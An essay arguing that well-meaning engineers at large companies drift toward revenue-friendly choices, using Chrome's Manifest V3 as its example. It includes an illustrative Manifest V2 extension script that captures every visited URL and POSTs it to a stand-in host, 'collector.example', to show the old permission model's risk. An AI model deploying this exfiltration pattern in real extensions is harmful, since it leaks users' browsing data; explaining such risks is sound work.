The asymmetry of nudges
Answering the age-old question: why do bad decisions happen to good companies?
It’s a common trope that big businesses are inherently corrupt; that there is something that happens when you incorporate in Delaware that strips you of all humanity. In fiction and in journalism, the fault almost always lies with the executives: a clique of unlikable men who control every aspect of the business and seek only profit, influence, and fame. This narrative is appealing in part because it absolves us of blame: we, the line employees, are good people. We care about others. Our kind is cut from a different cloth.
But as an experiment, let’s posit the unthinkable. Imagine that most founders and CEOs are good people trying to do the right thing. They mean it when they say “don’t be evil” or “focus on the user”. They take care to hire high-minded individuals and then empower them to make decisions about the company. In this world, how can we explain the emergence of user-hostile products and services?
To answer this question, let’s look at a specific, timely example: the development of the Manifest V3 API in Google Chrome. This proposal to revamp the permission model for browser extensions drew widespread condemnation from the industry. It was portrayed as a dishonest, self-serving move meant to rid the web of ad blockers that were starting to hurt the company’s bottom line.
In reality, Manifest V3 was meant to solve a real problem — and to do so for the right reasons. I know this because about eight years ago, we set out to conduct a survey of the privacy practices of popular browser extensions. We were appalled by what we uncovered. From antivirus to “privacy” tools, a considerable number of extensions hoovered up data for no discernible reason. Some went as far as sending all the URLs visited by the user — including encrypted traffic — to endpoints served over plain text. Even for well-behaved extensions, their popularity, coupled with excessive permissions, opened the door to abuse. The compromise of a single developer account could have given the bad guys access to the digital lives of untold millions of users — exposing their banking, email, and more.
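To make the risk concrete, here is a rough sketch of what the pre-MV3 architecture allowed. It is an illustrative example rather than code from any extension we surveyed; it assumes the classic Manifest V2 permissions and the blocking webRequest API, and the collection endpoint is made up:

```js
// manifest.json (Manifest V2) -- a permission block countless extensions shipped with:
//   "permissions": ["webRequest", "webRequestBlocking", "<all_urls>"]

// background.js -- with those permissions granted, the extension observes every
// request the browser makes, including the full URLs of HTTPS traffic:
chrome.webRequest.onBeforeRequest.addListener(
  (details) => {
    // details.url carries query strings, session tokens, document names, and so on.
    // Nothing in the old model stopped code like this from shipping it elsewhere;
    // "collector.example" is a hypothetical endpoint used purely for illustration.
    fetch("https://collector.example/log", { method: "POST", body: details.url });
    return {}; // let the request proceed so the user notices nothing
  },
  { urls: ["<all_urls>"] },
  ["blocking"]
);
```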
In the end, we concluded that the extension ecosystem had matured to the point where the old architecture was an indefensible security and privacy risk. There was no way to fix this while still keeping extensions simple to publish, easy to install, and capable of doing whatever the heck they want. One of these had to give, and Manifest V3 was the most elegant technical approach. Far from being the brainchild of a sociopathic executive, its architecture was devised by well-meaning engineers on the Chrome team. In fact, I suspect that our earlier investigation might have played some role in getting the effort off the ground.
But when it comes to ad blockers specifically, another thing is true: although MV3 provides robust facilities for URL-based filtering, it ultimately puts such tools at a long-term disadvantage in the escalating arms race with content publishers. Indeed, Google threw its own hat into the ring not long after, cracking down on ad blockers on YouTube — and one has to note that URL-based filters are far easier for Google to rein in than an old-school, unconstrained content script.
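For contrast, here is roughly what URL-based filtering looks like under MV3’s declarativeNetRequest API; the filter pattern below is invented for the sake of the example. The key property is that the browser evaluates the rules on the extension’s behalf, so the blocker never sees the traffic, and whatever the rule syntax and rule quotas cannot express cannot be blocked:

```js
// MV3 service worker: the extension registers a declarative rule and steps aside.
// Requires the "declarativeNetRequest" permission in the MV3 manifest.
chrome.declarativeNetRequest.updateDynamicRules({
  removeRuleIds: [1], // drop any earlier version of this rule
  addRules: [
    {
      id: 1,
      priority: 1,
      action: { type: "block" },
      condition: {
        urlFilter: "||ads.example^", // adblock-style URL pattern (illustrative)
        resourceTypes: ["script", "image", "sub_frame"],
      },
    },
  ],
});
```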
In other words, the project was born out of a genuine concern for user safety, but it probably also serves Google’s more contentious business goals. The problem isn’t that MV3 happened; it’s that such projects can only unfold one way. If you’re an engineer at Google, Facebook, Apple, or Microsoft, it’s always easier to propose architectural changes that don’t hurt the bottom line, or perhaps bolster it by accident. Conversely, if your proposal stands to wipe out a good chunk of revenue, you either self-censor and don’t bring it up — or you end up getting sucked into endless, futile arguments.
I call it the asymmetry of nudges: the implicit elimination of certain choices that skews the cumulative effect of well-intentioned, earnest changes in a way that ultimately robs users of choice or harms them in other ways. And we — the well-meaning engineers — shoulder much of the blame.
FWIW, I've seen this compared to the Upton Sinclair quote: “It is difficult to get a man to understand something when his salary depends on his not understanding it.” I think what I'm proposing here is a softer flavor of the same thing. It's not about failing to understand; it's about making a rational choice between three options:
1) Try to ship something that's great for the user, but reckless for the company or upsetting to many of your coworkers,
2) Ship something that's less good for some users, but doesn't harm revenue and doesn't start any turf wars,
3) [An implicit universe of terrible choices that we're not going to make because we're good people.]
In that world, you pretty reliably pick #2. In isolation, these decisions make perfect sense. But in aggregate, they tend to chip away at user choice.
A related version of this phenomenon applies to privacy: if you're working on a corporate privacy team, it's pretty unlikely that anyone will ever come to you asking to collect less data or store it for a shorter period.
The requests you do get all nudge the organization in one direction, and their incremental nature often makes it hard to draw a line: after all, a retention period of 10 days is not hugely different from 5, and 15 days is not that different from 10.